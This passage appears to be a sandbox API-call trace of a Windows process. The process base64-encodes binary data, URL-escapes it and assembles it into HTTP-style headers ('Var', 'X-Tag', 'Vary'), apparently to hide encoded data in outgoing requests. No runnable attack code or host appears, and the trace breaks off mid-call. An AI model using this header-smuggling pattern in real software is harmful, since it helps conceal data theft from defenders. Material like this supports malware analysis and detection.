loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D", lpString2="\r\n" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\n") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\n" [0144.195] GetProcessHeap () returned 0x440000 [0144.195] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0144.195] GetProcessHeap () returned 0x440000 [0144.195] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caed20 | out: hHeap=0x440000) returned 1 [0144.195] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0144.195] CryptBinaryToStringA (in: pbBinary=0x2caf6f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f68c | out: pszString=0x0, pcchString=0x14f68c) returned 1 [0144.195] GetProcessHeap () returned 0x440000 [0144.195] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2caed20 [0144.196] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0144.196] CryptBinaryToStringA (in: pbBinary=0x2caf6f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2caed20, pcchString=0x14f68c | out: pszString="iDcbusgPcI+9J48PSBM1LFqfLJw626+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pcchString=0x14f68c) returned 1 [0144.196] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0144.196] lstrlenA (lpString="iDcbusgPcI+9J48PSBM1LFqfLJw626+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==") returned 344 [0144.196] GetProcessHeap () returned 0x440000 [0144.196] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17d) returned 0x2ca9e30 [0144.196] StrCSpnA (lpStr="iDcbusgPcI+9J48PSBM1LFqfLJw626+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 10 [0144.196] StrSpnA (psz="+9J48PSBM1LFqfLJw626+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="9J48PSBM1LFqfLJw626+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 19 [0144.196] StrSpnA (psz="+BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="BtihZNtil17K+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 12 [0144.196] StrSpnA (psz="+NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="NQH+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 3 [0144.196] StrSpnA (psz="+wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="wXMUnsCqbgjyTzasu/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 17 [0144.196] StrSpnA (psz="/6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 45 [0144.196] StrSpnA (psz="+UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="UUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 76 [0144.196] StrSpnA (psz="+SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.196] StrCSpnA (lpStr="SIVOEuD1w8F+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 11 [0144.196] StrSpnA (psz="+kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="kKDGshFgiK/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 10 [0144.197] StrSpnA (psz="/VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="VVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 53 [0144.197] StrSpnA (psz="/hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="hRo7DOY7dp+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 10 [0144.197] StrSpnA (psz="+mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="mAd1h+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 5 [0144.197] StrSpnA (psz="+QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="QMXSURP5BDFPlX5W/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 16 [0144.197] StrSpnA (psz="/STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="STQMi+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 5 [0144.197] StrSpnA (psz="+Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="Pb7T2MDnK9Gf+K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 12 [0144.197] StrSpnA (psz="+K1a/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="K1a/ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 3 [0144.197] StrSpnA (psz="/ukeydTpcJEYk1RGeJsw==", pszSet="+/=") returned 1 [0144.197] StrCSpnA (lpStr="ukeydTpcJEYk1RGeJsw==", lpSet="+/=") returned 19 [0144.197] StrSpnA (psz="==", pszSet="+/=") returned 2 [0144.197] lstrlenA (lpString="iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D") returned 380 [0144.197] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\n", lpString2="Vary" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary" [0144.197] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary", lpString2=": " | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: ") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: " [0144.198] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: 